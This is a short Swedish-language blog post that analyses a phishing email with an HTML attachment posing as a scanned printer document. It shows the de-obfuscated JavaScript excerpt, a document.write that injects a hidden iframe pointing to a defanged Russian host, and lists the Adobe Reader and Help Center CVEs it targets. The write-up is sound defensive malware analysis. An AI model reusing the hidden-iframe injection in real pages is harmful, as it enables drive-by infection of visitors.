Som du ser är vår webbplats inte anpassad för äldre webbläsare. Vi rekommenderar att du uppgraderar till en nyare webbläsare.

Uppdaterad | Publicerad

Kort analys av ett suspekt mejl med en bifogad fil

En liten beskriving av en moderat svår tekniskt metod för att få fram vad ett suspekt mejl med bifogad fil kan göra om man inte är försiktig.

Snabb analys av en suspekt bifogad fil i mejl.

Den här analysen kräver moderata tekniska kunskaper för att kunna ge en fingervisning om innehållet i den bifogade filen är elakartat eller ej. Obs det är ingen garanti om det inte skulle peka på elakartad hantering utan vanligt sunt förnuft behövs fortfarande. I det här fallet kan vi redan se att ett mejl från okänd avsändare med en text om en utskrift som inte gjorts med en .htm fil bifogad är en dålig ide att inte bara kasta direkt.

Avsändare:

do-not-reply@livejournal.com

I mejltexten.

Attached document was scanned and sentto you using a Hewlett-Packard HP:F58502P.SENT BY : Adora

PAGES : 9

FILETYPE: .HTML [Internet Explorer File]

Filen sparas ner till till en labbmaskin och för att läsa den använder vi ett kommandoradsverktyg, less under linux eller type under Windows.

Filens innehåll

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR

/html4/loose.dtd"\>

<html\>

<head\>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8"\>

</head\>

<body\>

<h1\><b\>Please wait a moment. You will be forwarded...</h1\></b\>

<TAG\> an massa obfuskerad javascript som tyvärr verkar trigga vissa AV så nu är det bortatget avslutat, med en script tag)

</body\>

Det är ganska lätt att se att javascriptdelen (ovan är den trunkerad för att inte kunna ställa till skada), den mellan <script> och </script> är obfuskerad. Så vi laddar upp den till online-verktyget wepawet (http://wepawet.iseclab.org/).

Analys i wepawet http://wepawet.iseclab.org/view.php?hash=2e12ae0e2472bcd43e4f08e82faaf561&type=js&t=1344886685

Utdrag ur analysen ovan.

document.write("

<iframe src='hxxp://mirdymas.ru:8080/forum/showthread.php?page=xxxxxxxxxxxxxx' width='10

' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'\></iframe\>");

}

Här kan vi se att våran bifogade fil innehåller en länk till ett ryskt forum.

Ny analys efter klick på länken i den gamla analysen (hxxp://mirdymas.ru:8080/forum/showthread.php?page=xxxxxx)

http://wepawet.iseclab.org/view.php?type=js&hash=2e807e3fda9436a4bbf3d7eb694483e3&t=1344888484

Detection results

Detector Result

Jsand 2.3.4 malicious

...

Adobe Libtiff Libtiff integer overflow in Adobe Reader and Acrobat CVE-2010-0188

HPC URL Help Center URL Validation Vulnerability CVE-2010-1885

Plus en massa ytterligare fördjupad teknisk information men för de flesta ändamål räcker det att konstatera att den bifogade filen var obfuskerad, efter de-obfuskering så framträdde en suspekt länk samt att anlys av den suspekta länken ledde till ett "Malicious" resultat med avsikt att försöka utnyttja sårbarheter i Adobe respektive Help Center.